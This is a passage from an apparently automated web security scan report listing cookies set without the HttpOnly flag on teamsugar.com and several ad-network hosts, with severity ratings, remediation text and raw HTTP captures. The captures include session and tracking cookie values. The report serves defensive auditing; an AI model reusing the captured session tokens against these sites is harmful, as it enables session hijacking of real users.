<img src="http://bh.contextweb.com/bh/set.aspx?action=replace&advid=996&token=FACO1" width="1" height="1" border="0">
<!-- ContextWeb End -->
...[SNIP]...

5. Cookie without HttpOnly flag set
There are 51 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://teamsugar.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://teamsugar.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: teamsugar.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
X-Sugar-Origin-Server: sugar-prod-web013-lax1.int.sugarinc.com
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=jj74rf9b5tana4c9qnqn6bimm6; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/
Set-Cookie: fg_locale=0; expires=Tue, 13-Sep-2011 12:47:53 GMT; path=/
Set-Cookie: client_locale=US; expires=Tue, 13-Sep-2011 12:47:53 GMT; path=/
Set-Cookie: sugarTestGroup=test; expires=Wed, 12-Oct-2011 12:47:53 GMT; path=/
Set-Cookie: ss1=0%7C1317831673%7CVtj50HZwVAf6XzfIzt45pAblVAlc658GleP1Nc35FHkxaznENVLWjwa6r%2F7%2FQyRFoDzvuZz8AHFrPwF2UlWsOSIIMrujdWcpuo8VFkywg9FaGJmF0KJRXqCWs5NNKfWFiSyueATPQRfbR%2B1oC0dkUnnxhQoHq43iqkB01kLggEksGLjY551W6XFy28G0iib7WHLy2wxKaiGtC1Pj3NDByA%3D%3D%7Ca8777ef288ebc1c6896acd503ed0e87922f8d289; expires=Wed, 05-Oct-2011 16:21:13 GMT; path=/; httponly
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Vary: Cookie
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVA IVD CONi HIS OUR DELi SAMi IND UNI INT CNT"
Location: http://www.popsugar.com/community/welcome
Connection: close
Date: Mon, 12 Sep 2011 12:47:53 GMT
Server: lighttpd/1.4.26
Content-Length: 0


5.2. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=117090495&th=37103964303&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fc14.zedo.com%2FOzoDB%2Fcutils%2FR53_7_7%2Fjsc%2F1545%2Fzpu.html%3Fn%3D1545%3Bf%3D1%3Bz%3D2-110&f=2&p=9679837&a=1&rnd=9678783 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 09-Sep-2021 12:49:41 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1213154547 = new Image();\r\n tfimg1213154547.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=0";\r\n})();\r\n<\/sc
...[SNIP]...

5.3. http://a.visualrevenue.com/vr.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.visualrevenue.com
Path:   /vr.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vr.js HTTP/1.1
Host: a.visualrevenue.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=172800
Cache-control: no-cache="set-cookie"
Content-Type: application/x-javascript
Date: Mon, 12 Sep 2011 12:47:51 GMT
Expires: Wed, 14 Sep 2011 12:47:51 GMT
Last-Modified: Tue, 01 Mar 2011 15:37:51 GMT
Server: nginx/1.0.5
Set-Cookie: AWSELB=0BEDD35ED8E6CA32BF18800A787004E3CF91BCBE3BFFB80FABF921A28E20105DFD0A7192507C14F040EBFEBE46C99980BBB5B288638CA88B7C61B7C4DEF91CE45E362C70;PATH=/;MAX-AGE=1800
Content-Length: 1105
Connection: keep-alive

(function(){function j(h){var b;a:{b=document.cookie.split(";");for(var c=0;c<b.length;c++){for(var a=b[c];a.charAt(0)==" ";)a=a.substring(1,a.length);if(a.indexOf("__vrf=")==0){b=a.substring(6,a.leng
...[SNIP]...

5.4. http://ad.yieldmanager.com/iframe3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe3?msUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy.dJAYBFUAbL90kBgEVQAAAeoulitI.ZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE-S2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA==,,http%3A%2F%2Fwww.nowpublic.com%2F,B%3D10%26Z%3D0x0%26_salt%3D1964679122%26anmember%3D541%26anprice%3D%26r%3D1%26s%3D1620509%26y%3D29,7d9e50b4-dd3d-11e0-90ef-78e7d161fe68 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAgAAAAAAAAAAAP8AAAACCKz8LgAAAAAAnggAAAAAAAAG1TIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2KRAAAAAAAAICAwAAAAAAGy%2EdJAYBFUAbL90kBgEVQAAAeoulitI%2EZmZmZmZmAUAAAPi53LjYPzMzMzMzMwdAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABbksInE%2DS2CpsKXXVhy0SGaDsCy0zxGJguLNV6AAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enowpublic%2Ecom%252F%2CB%253D10%2526Z%253D0x0%2526%5Fsalt%253D1964679122%2526anmember%253D541%2526anprice%253D%2526r%253D1%2526s%253D1620509%2526y%253D29%2C7d9e50b4%2Ddd3d%2D11e0%2D90ef%2D78e7d161fe68
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; 
bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#
=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...

5.5. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp?Z=0x0&anmember=541&anprice=&y=29&s=1620509&_salt=1964679122&B=10&r=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; 
bh="b!!!#d!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%
=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0229.rm.sp2
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:30 GMT
Pragma: no-cache
Content-Length: 846
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

var l = (screen.width - 300) / 2;
var t = (screen.height - 600) / 2;
var pop = window.open('http://adserving.cpxinteractive.com/rw?title=&qs=iframe3%3FmsUBAB26GADSD50AAAAAAMvWJgAAAAAAAAAEAAAAAAAAAAAAA
...[SNIP]...

5.6. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1079030&id=1079199&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; lifb=!6-Nb'W00AO<![f; 